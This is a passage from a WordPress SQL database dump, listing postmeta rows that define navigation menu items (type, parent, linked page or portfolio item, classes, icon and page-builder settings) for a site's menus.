),(56531,4403,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56532,4403,'_menu_item_xfn',''),(56533,4403,'_menu_item_url',''),(56534,4403,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56535,4403,'_menu_item_icon','null'),(56536,4404,'_menu_item_type','post_type'),(56537,4404,'_menu_item_menu_item_parent','4374'),(56538,4404,'_menu_item_object_id','3035'),(56539,4404,'_menu_item_object','page'),(56540,4404,'_menu_item_target',''),(56541,4404,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56542,4404,'_menu_item_xfn',''),(56543,4404,'_menu_item_url',''),(56544,4404,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56545,4404,'_menu_item_icon','null'),(56546,4405,'_menu_item_type','post_type'),(56547,4405,'_menu_item_menu_item_parent','4362'),(56548,4405,'_menu_item_object_id','3034'),(56549,4405,'_menu_item_object','page'),(56550,4405,'_menu_item_target',''),(56551,4405,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56552,4405,'_menu_item_xfn',''),(56553,4405,'_menu_item_url',''),(56554,4405,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56555,4406,'_menu_item_type','post_type'),(56556,4406,'_menu_item_menu_item_parent','4367'),(56557,4406,'_menu_item_object_id','3034'),(56558,4406,'_menu_item_object','page'),(56559,4406,'_menu_item_target',''),(56560,4406,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56561,4406,'_menu_item_xfn',''),(56562,4406,'_menu_item_url',''),(56563,4406,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56564,4407,'_menu_item_type','post_type'),(56565,4407,'_menu_item_menu_item_parent','4348'),(56566,4407,'_menu_item_object_id','3042'),(56567,4407,'_menu_item_object','page'),(56568,4407,'_menu_item_target',''),(56569,4407,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56570,4407,'_menu_item_xfn',''),(56571,4407,'_menu_item_url',''),(56572,4407,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56573,4407,'_menu_item_icon','null'),(56574,4408,'_menu_item_type','post_type'),(56575,4408,'_menu_item_menu_item_parent','4348'),(56576,4408,'_menu_item_object_id','3041'),(56577,4408,'_menu_item_object','page'),(56578,4408,'_menu_item_target',''),(56579,4408,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56580,4408,'_menu_item_xfn',''),(56581,4408,'_menu_item_url',''),(56582,4408,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56583,4408,'_menu_item_icon','null'),(56584,4409,'_menu_item_type','post_type'),(56585,4409,'_menu_item_menu_item_parent','4354'),(56586,4409,'_menu_item_object_id','3042'),(56587,4409,'_menu_item_object','page'),(56588,4409,'_menu_item_target',''),(56589,4409,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56590,4409,'_menu_item_xfn',''),(56591,4409,'_menu_item_url',''),(56592,4409,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56593,4409,'_menu_item_icon','null'),(56594,4410,'_menu_item_type','post_type'),(56595,4410,'_menu_item_menu_item_parent','4354'),(56596,4410,'_menu_item_object_id','3041'),(56597,4410,'_menu_item_object','page'),(56598,4410,'_menu_item_target',''),(56599,4410,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56600,4410,'_menu_item_xfn',''),(56601,4410,'_menu_item_url',''),(56602,4410,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56603,4410,'_menu_item_icon','null'),(56604,4411,'_menu_item_type','post_type'),(56605,4411,'_menu_item_menu_item_parent','4374'),(56606,4411,'_menu_item_object_id','3044'),(56607,4411,'_menu_item_object','page'),(56608,4411,'_menu_item_target',''),(56609,4411,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56610,4411,'_menu_item_xfn',''),(56611,4411,'_menu_item_url',''),(56612,4411,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56613,4411,'_menu_item_icon','null'),(56614,4412,'_menu_item_type','post_type'),(56615,4412,'_menu_item_menu_item_parent','4367'),(56616,4412,'_menu_item_object_id','3044'),(56617,4412,'_menu_item_object','page'),(56618,4412,'_menu_item_target',''),(56619,4412,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56620,4412,'_menu_item_xfn',''),(56621,4412,'_menu_item_url',''),(56622,4412,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56623,4413,'_menu_item_type','post_type'),(56624,4413,'_menu_item_menu_item_parent','4371'),(56625,4413,'_menu_item_object_id','3044'),(56626,4413,'_menu_item_object','page'),(56627,4413,'_menu_item_target',''),(56628,4413,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56629,4413,'_menu_item_xfn',''),(56630,4413,'_menu_item_url',''),(56631,4413,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56632,4413,'_menu_item_icon','null'),(56633,4414,'_menu_item_type','post_type'),(56634,4414,'_menu_item_menu_item_parent','4349'),(56635,4414,'_menu_item_object_id','3043'),(56636,4414,'_menu_item_object','page'),(56637,4414,'_menu_item_target',''),(56638,4414,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56639,4414,'_menu_item_xfn',''),(56640,4414,'_menu_item_url',''),(56641,4414,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56642,4414,'_menu_item_icon','null'),(56643,4415,'_menu_item_type','post_type'),(56644,4415,'_menu_item_menu_item_parent','4355'),(56645,4415,'_menu_item_object_id','3043'),(56646,4415,'_menu_item_object','page'),(56647,4415,'_menu_item_target',''),(56648,4415,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56649,4415,'_menu_item_xfn',''),(56650,4415,'_menu_item_url',''),(56651,4415,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56652,4415,'_menu_item_icon','null'),(56653,4416,'_menu_item_type','post_type'),(56654,4416,'_menu_item_menu_item_parent','4373'),(56655,4416,'_menu_item_object_id','3047'),(56656,4416,'_menu_item_object','page'),(56657,4416,'_menu_item_target',''),(56658,4416,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56659,4416,'_menu_item_xfn',''),(56660,4416,'_menu_item_url',''),(56661,4416,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56662,4416,'_menu_item_icon','null'),(56663,4417,'_menu_item_type','post_type'),(56664,4417,'_menu_item_menu_item_parent','4373'),(56665,4417,'_menu_item_object_id','3046'),(56666,4417,'_menu_item_object','page'),(56667,4417,'_menu_item_target',''),(56668,4417,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56669,4417,'_menu_item_xfn',''),(56670,4417,'_menu_item_url',''),(56671,4417,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56672,4417,'_menu_item_icon','null'),(56673,4418,'_menu_item_type','post_type'),(56674,4418,'_menu_item_menu_item_parent','4373'),(56675,4418,'_menu_item_object_id','3045'),(56676,4418,'_menu_item_object','page'),(56677,4418,'_menu_item_target',''),(56678,4418,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56679,4418,'_menu_item_xfn',''),(56680,4418,'_menu_item_url',''),(56681,4418,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56682,4418,'_menu_item_icon','null'),(56683,4419,'_menu_item_type','post_type'),(56684,4419,'_menu_item_menu_item_parent','4367'),(56685,4419,'_menu_item_object_id','3045'),(56686,4419,'_menu_item_object','page'),(56687,4419,'_menu_item_target',''),(56688,4419,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56689,4419,'_menu_item_xfn',''),(56690,4419,'_menu_item_url',''),(56691,4419,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56692,4420,'_menu_item_type','post_type'),(56693,4420,'_menu_item_menu_item_parent','4370'),(56694,4420,'_menu_item_object_id','3047'),(56695,4420,'_menu_item_object','page'),(56696,4420,'_menu_item_target',''),(56697,4420,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56698,4420,'_menu_item_xfn',''),(56699,4420,'_menu_item_url',''),(56700,4420,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56701,4420,'_menu_item_icon','null'),(56702,4421,'_menu_item_type','post_type'),(56703,4421,'_menu_item_menu_item_parent','4370'),(56704,4421,'_menu_item_object_id','3046'),(56705,4421,'_menu_item_object','page'),(56706,4421,'_menu_item_target',''),(56707,4421,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56708,4421,'_menu_item_xfn',''),(56709,4421,'_menu_item_url',''),(56710,4421,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56711,4421,'_menu_item_icon','null'),(56712,4422,'_menu_item_type','post_type'),(56713,4422,'_menu_item_menu_item_parent','4370'),(56714,4422,'_menu_item_object_id','3045'),(56715,4422,'_menu_item_object','page'),(56716,4422,'_menu_item_target',''),(56717,4422,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56718,4422,'_menu_item_xfn',''),(56719,4422,'_menu_item_url',''),(56720,4422,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56721,4422,'_menu_item_icon','null'),(56722,4423,'_menu_item_type','post_type'),(56723,4423,'_menu_item_menu_item_parent','4355'),(56724,4423,'_menu_item_object_id','3048'),(56725,4423,'_menu_item_object','page'),(56726,4423,'_menu_item_target',''),(56727,4423,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56728,4423,'_menu_item_xfn',''),(56729,4423,'_menu_item_url',''),(56730,4423,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56731,4423,'_menu_item_icon','null'),(56732,4424,'_menu_item_type','post_type'),(56733,4424,'_menu_item_menu_item_parent','4355'),(56734,4424,'_menu_item_object_id','3051'),(56735,4424,'_menu_item_object','page'),(56736,4424,'_menu_item_target',''),(56737,4424,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56738,4424,'_menu_item_xfn',''),(56739,4424,'_menu_item_url',''),(56740,4424,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56741,4424,'_menu_item_icon','null'),(56742,4425,'_menu_item_type','post_type'),(56743,4425,'_menu_item_menu_item_parent','4355'),(56744,4425,'_menu_item_object_id','3050'),(56745,4425,'_menu_item_object','page'),(56746,4425,'_menu_item_target',''),(56747,4425,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56748,4425,'_menu_item_xfn',''),(56749,4425,'_menu_item_url',''),(56750,4425,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56751,4425,'_menu_item_icon','null'),(56752,4426,'_menu_item_type','post_type'),(56753,4426,'_menu_item_menu_item_parent','4355'),(56754,4426,'_menu_item_object_id','3049'),(56755,4426,'_menu_item_object','page'),(56756,4426,'_menu_item_target',''),(56757,4426,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56758,4426,'_menu_item_xfn',''),(56759,4426,'_menu_item_url',''),(56760,4426,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56761,4426,'_menu_item_icon','null'),(56762,4427,'_menu_item_type','post_type'),(56763,4427,'_menu_item_menu_item_parent','4354'),(56764,4427,'_menu_item_object_id','3040'),(56765,4427,'_menu_item_object','page'),(56766,4427,'_menu_item_target',''),(56767,4427,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56768,4427,'_menu_item_xfn',''),(56769,4427,'_menu_item_url',''),(56770,4427,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56771,4427,'_menu_item_icon','null'),(56772,4428,'_menu_item_type','post_type'),(56773,4428,'_menu_item_menu_item_parent','4365'),(56774,4428,'_menu_item_object_id','3042'),(56775,4428,'_menu_item_object','page'),(56776,4428,'_menu_item_target',''),(56777,4428,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56778,4428,'_menu_item_xfn',''),(56779,4428,'_menu_item_url',''),(56780,4428,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56781,4429,'_menu_item_type','post_type'),(56782,4429,'_menu_item_menu_item_parent','4365'),(56783,4429,'_menu_item_object_id','3040'),(56784,4429,'_menu_item_object','page'),(56785,4429,'_menu_item_target',''),(56786,4429,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56787,4429,'_menu_item_xfn',''),(56788,4429,'_menu_item_url',''),(56789,4429,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56790,4430,'_menu_item_type','post_type'),(56791,4430,'_menu_item_menu_item_parent','4360'),(56792,4430,'_menu_item_object_id','3040'),(56793,4430,'_menu_item_object','page'),(56794,4430,'_menu_item_target',''),(56795,4430,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56796,4430,'_menu_item_xfn',''),(56797,4430,'_menu_item_url',''),(56798,4430,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56799,4431,'_menu_item_type','post_type'),(56800,4431,'_menu_item_menu_item_parent','4355'),(56801,4431,'_menu_item_object_id','3052'),(56802,4431,'_menu_item_object','page'),(56803,4431,'_menu_item_target',''),(56804,4431,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56805,4431,'_menu_item_xfn',''),(56806,4431,'_menu_item_url',''),(56807,4431,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56808,4431,'_menu_item_icon','null'),(56809,4432,'_menu_item_type','post_type'),(56810,4432,'_menu_item_menu_item_parent','4348'),(56811,4432,'_menu_item_object_id','3053'),(56812,4432,'_menu_item_object','page'),(56813,4432,'_menu_item_target',''),(56814,4432,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56815,4432,'_menu_item_xfn',''),(56816,4432,'_menu_item_url',''),(56817,4432,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56818,4432,'_menu_item_icon','null'),(56819,4433,'_menu_item_type','post_type'),(56820,4433,'_menu_item_menu_item_parent','4354'),(56821,4433,'_menu_item_object_id','3053'),(56822,4433,'_menu_item_object','page'),(56823,4433,'_menu_item_target',''),(56824,4433,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56825,4433,'_menu_item_xfn',''),(56826,4433,'_menu_item_url',''),(56827,4433,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56828,4433,'_menu_item_icon','null'),(56829,4434,'_menu_item_type','post_type'),(56830,4434,'_menu_item_menu_item_parent','4365'),(56831,4434,'_menu_item_object_id','3053'),(56832,4434,'_menu_item_object','page'),(56833,4434,'_menu_item_target',''),(56834,4434,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56835,4434,'_menu_item_xfn',''),(56836,4434,'_menu_item_url',''),(56837,4434,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56838,4435,'_menu_item_type','post_type'),(56839,4435,'_menu_item_menu_item_parent','4348'),(56840,4435,'_menu_item_object_id','3055'),(56841,4435,'_menu_item_object','page'),(56842,4435,'_menu_item_target',''),(56843,4435,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56844,4435,'_menu_item_xfn',''),(56845,4435,'_menu_item_url',''),(56846,4435,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56847,4435,'_menu_item_icon','null'),(56848,4436,'_menu_item_type','post_type'),(56849,4436,'_menu_item_menu_item_parent','4354'),(56850,4436,'_menu_item_object_id','3055'),(56851,4436,'_menu_item_object','page'),(56852,4436,'_menu_item_target',''),(56853,4436,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56854,4436,'_menu_item_xfn',''),(56855,4436,'_menu_item_url',''),(56856,4436,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56857,4436,'_menu_item_icon','null'),(56858,4437,'_menu_item_type','post_type'),(56859,4437,'_menu_item_menu_item_parent','4354'),(56860,4437,'_menu_item_object_id','3441'),(56861,4437,'_menu_item_object','page'),(56862,4437,'_menu_item_target',''),(56863,4437,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56864,4437,'_menu_item_xfn',''),(56865,4437,'_menu_item_url',''),(56866,4437,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56867,4437,'_menu_item_icon','null'),(56868,4438,'_menu_item_type','post_type'),(56869,4438,'_menu_item_menu_item_parent','4348'),(56870,4438,'_menu_item_object_id','3441'),(56871,4438,'_menu_item_object','page'),(56872,4438,'_menu_item_target',''),(56873,4438,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56874,4438,'_menu_item_xfn',''),(56875,4438,'_menu_item_url',''),(56876,4438,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56877,4438,'_menu_item_icon','null'),(56878,4439,'_menu_item_type','post_type'),(56879,4439,'_menu_item_menu_item_parent','4355'),(56880,4439,'_menu_item_object_id','3054'),(56881,4439,'_menu_item_object','page'),(56882,4439,'_menu_item_target',''),(56883,4439,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56884,4439,'_menu_item_xfn',''),(56885,4439,'_menu_item_url',''),(56886,4439,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56887,4439,'_menu_item_icon','null'),(56888,4440,'_menu_item_type','post_type'),(56889,4440,'_menu_item_menu_item_parent','4355'),(56890,4440,'_menu_item_object_id','3057'),(56891,4440,'_menu_item_object','page'),(56892,4440,'_menu_item_target',''),(56893,4440,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56894,4440,'_menu_item_xfn',''),(56895,4440,'_menu_item_url',''),(56896,4440,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56897,4440,'_menu_item_icon','null'),(56898,4441,'_menu_item_type','post_type'),(56899,4441,'_menu_item_menu_item_parent','4355'),(56900,4441,'_menu_item_object_id','3058'),(56901,4441,'_menu_item_object','page'),(56902,4441,'_menu_item_target',''),(56903,4441,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56904,4441,'_menu_item_xfn',''),(56905,4441,'_menu_item_url',''),(56906,4441,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56907,4441,'_menu_item_icon','null'),(56908,4442,'_menu_item_type','post_type'),(56909,4442,'_menu_item_menu_item_parent','4355'),(56910,4442,'_menu_item_object_id','4035'),(56911,4442,'_menu_item_object','page'),(56912,4442,'_menu_item_target',''),(56913,4442,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56914,4442,'_menu_item_xfn',''),(56915,4442,'_menu_item_url',''),(56916,4442,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56917,4442,'_menu_item_icon','null'),(56918,4443,'_menu_item_type','post_type'),(56919,4443,'_menu_item_menu_item_parent','4354'),(56920,4443,'_menu_item_object_id','3060'),(56921,4443,'_menu_item_object','page'),(56922,4443,'_menu_item_target',''),(56923,4443,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56924,4443,'_menu_item_xfn',''),(56925,4443,'_menu_item_url',''),(56926,4443,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56927,4443,'_menu_item_icon','null'),(56928,4444,'_menu_item_type','post_type'),(56929,4444,'_menu_item_menu_item_parent','4348'),(56930,4444,'_menu_item_object_id','3060'),(56931,4444,'_menu_item_object','page'),(56932,4444,'_menu_item_target',''),(56933,4444,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56934,4444,'_menu_item_xfn',''),(56935,4444,'_menu_item_url',''),(56936,4444,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56937,4444,'_menu_item_icon','null'),(56938,4445,'_menu_item_type','post_type'),(56939,4445,'_menu_item_menu_item_parent','4360'),(56940,4445,'_menu_item_object_id','3060'),(56941,4445,'_menu_item_object','page'),(56942,4445,'_menu_item_target',''),(56943,4445,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56944,4445,'_menu_item_xfn',''),(56945,4445,'_menu_item_url',''),(56946,4445,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56947,4446,'_menu_item_type','post_type'),(56948,4446,'_menu_item_menu_item_parent','4389'),(56949,4446,'_menu_item_object_id','3067'),(56950,4446,'_menu_item_object','page'),(56951,4446,'_menu_item_target',''),(56952,4446,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56953,4446,'_menu_item_xfn',''),(56954,4446,'_menu_item_url',''),(56955,4446,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56956,4446,'_menu_item_icon','null'),(56957,4447,'_menu_item_type','post_type'),(56958,4447,'_menu_item_menu_item_parent','4389'),(56959,4447,'_menu_item_object_id','3066'),(56960,4447,'_menu_item_object','page'),(56961,4447,'_menu_item_target',''),(56962,4447,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56963,4447,'_menu_item_xfn',''),(56964,4447,'_menu_item_url',''),(56965,4447,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56966,4447,'_menu_item_icon','null'),(56967,4448,'_menu_item_type','post_type'),(56968,4448,'_menu_item_menu_item_parent','4389'),(56969,4448,'_menu_item_object_id','3065'),(56970,4448,'_menu_item_object','page'),(56971,4448,'_menu_item_target',''),(56972,4448,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56973,4448,'_menu_item_xfn',''),(56974,4448,'_menu_item_url',''),(56975,4448,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56976,4448,'_menu_item_icon','null'),(56977,4449,'_menu_item_type','post_type'),(56978,4449,'_menu_item_menu_item_parent','4385'),(56979,4449,'_menu_item_object_id','3077'),(56980,4449,'_menu_item_object','portfolio-item'),(56981,4449,'_menu_item_target',''),(56982,4449,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56983,4449,'_menu_item_xfn',''),(56984,4449,'_menu_item_url',''),(56985,4449,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56986,4449,'_menu_item_icon','null'),(56987,4450,'_menu_item_type','post_type'),(56988,4450,'_menu_item_menu_item_parent','4385'),(56989,4450,'_menu_item_object_id','3076'),(56990,4450,'_menu_item_object','portfolio-item'),(56991,4450,'_menu_item_target',''),(56992,4450,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56993,4450,'_menu_item_xfn',''),(56994,4450,'_menu_item_url',''),(56995,4450,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56996,4450,'_menu_item_icon','null'),(56997,4451,'_menu_item_type','post_type'),(56998,4451,'_menu_item_menu_item_parent','4385'),(56999,4451,'_menu_item_object_id','3075'),(57000,4451,'_menu_item_object','portfolio-item'),(57001,4451,'_menu_item_target',''),(57002,4451,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57003,4451,'_menu_item_xfn',''),(57004,4451,'_menu_item_url',''),(57005,4451,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57006,4451,'_menu_item_icon','null'),(57007,4452,'_menu_item_type','post_type'),(57008,4452,'_menu_item_menu_item_parent','4385'),(57009,4452,'_menu_item_object_id','3098'),(57010,4452,'_menu_item_object','portfolio-item'),(57011,4452,'_menu_item_target',''),(57012,4452,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57013,4452,'_menu_item_xfn',''),(57014,4452,'_menu_item_url',''),(57015,4452,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57016,4452,'_menu_item_icon','null'),(57017,4453,'_menu_item_type','post_type'),(57018,4453,'_menu_item_menu_item_parent','4354'),(57019,4453,'_menu_item_object_id','3068'),(57020,4453,'_menu_item_object','page'),(57021,4453,'_menu_item_target',''),(57022,4453,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57023,4453,'_menu_item_xfn',''),(57024,4453,'_menu_item_url',''),(57025,4453,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57026,4453,'_menu_item_icon','null'),(57027,4454,'_menu_item_type','post_type'),(57028,4454,'_menu_item_menu_item_parent','4348'),(57029,4454,'_menu_item_object_id','3068'),(57030,4454,'_menu_item_object','page'),(57031,4454,'_menu_item_target',''),(57032,4454,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57033,4454,'_menu_item_xfn',''),(57034,4454,'_menu_item_url',''),(57035,4454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57036,4454,'_menu_item_icon','null'),(57037,4455,'_menu_item_type','post_type'),(57038,4455,'_menu_item_menu_item_parent','4377'),(57039,4455,'_menu_item_object_id','3071'),(57040,4455,'_menu_item_object','page'),(57041,4455,'_menu_item_target',''),(57042,4455,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57043,4455,'_menu_item_xfn',''),(57044,4455,'_menu_item_url',''),(57045,4455,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57046,4455,'_menu_item_icon','null'),(57047,4456,'_menu_item_type','post_type'),(57048,4456,'_menu_item_menu_item_parent','4380'),(57049,4456,'_menu_item_object_id','3070'),(57050,4456,'_menu_item_object','page'),(57051,4456,'_menu_item_target',''),(57052,4456,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57053,4456,'_menu_item_xfn',''),(57054,4456,'_menu_item_url',''),(57055,4456,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57056,4456,'_menu_item_icon','null'),(57057,4457,'_menu_item_type','post_type'),(57058,4457,'_menu_item_menu_item_parent','4380'),(57059,4457,'_menu_item_object_id','3069'),(57060,4457,'_menu_item_object','page'),(57061,4457,'_menu_item_target',''),(57062,4457,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57063,4457,'_menu_item_xfn',''),(57064,4457,'_menu_item_url',''),(57065,4457,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57066,4457,'_menu_item_icon','null'),(57067,4458,'_menu_item_type','post_type'),(57068,4458,'_menu_item_menu_item_parent','4381'),(57069,4458,'_menu_item_object_id','3071'),(57070,4458,'_menu_item_object','page'),(57071,4458,'_menu_item_target',''),(57072,4458,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57073,4458,'_menu_item_xfn',''),(57074,4458,'_menu_item_url',''),(57075,4458,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57076,4458,'_menu_item_icon','null'),(57077,4459,'_menu_item_type','post_type'),(57078,4459,'_menu_item_menu_item_parent','4384'),(57079,4459,'_menu_item_object_id','3070'),(57080,4459,'_menu_item_object','page'),(57081,4459,'_menu_item_target',''),(57082,4459,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57083,4459,'_menu_item_xfn',''),(57084,4459,'_menu_item_url',''),(57085,4459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57086,4459,'_menu_item_icon','null'),(57087,4460,'_menu_item_type','post_type'),(57088,4460,'_menu_item_menu_item_parent','4384'),(57089,4460,'_menu_item_object_id','3069'),(57090,4460,'_menu_item_object','page'),(57091,4460,'_menu_item_target',''),(57092,4460,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57093,4460,'_menu_item_xfn',''),(57094,4460,'_menu_item_url',''),(57095,4460,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57096,4460,'_menu_item_icon','null'),(57097,4461,'_menu_item_type','post_type'),(57098,4461,'_menu_item_menu_item_parent','4381'),(57099,4461,'_menu_item_object_id','3072'),(57100,4461,'_menu_item_object','page'),(57101,4461,'_menu_item_target',''),(57102,4461,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57103,4461,'_menu_item_xfn',''),(57104,4461,'_menu_item_url',''),(57105,4461,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57106,4461,'_menu_item_icon','null'),(57107,4462,'_menu_item_type','post_type'),(57108,4462,'_menu_item_menu_item_parent','4377'),(57109,4462,'_menu_item_object_id','3072'),(57110,4462,'_menu_item_object','page'),(57111,4462,'_menu_item_target',''),(57112,4462,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57113,4462,'_menu_item_xfn',''),(57114,4462,'_menu_item_url',''),(57115,4462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57116,4462,'_menu_item_icon','null'),(57117,4463,'_menu_item_type','post_type'),(57118,4463,'_menu_item_menu_item_parent','4377'),(57119,4463,'_menu_item_object_id','1382'),(57120,4463,'_menu_item_object','page'),(57121,4463,'_menu_item_target',''),(57122,4463,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57123,4463,'_menu_item_xfn',''),(57124,4463,'_menu_item_url',''),(57125,4463,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(57126,4463,'_menu_item_icon','null'),(57127,4464,'_menu_item_type','post_type'),(57128,4464,'_menu_item_menu_item_parent','4381'),(57129,4464,'_menu_item_object_id','1382'),(57130,4464,'_menu_item_object','page'),(57131,4464,'_menu_item_target',''),(57132,4464,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(57133,4464,'_menu_item_xfn',''),(57134,4464,'_menu_item_url',''),(57135,4464,'_vc_post_settings'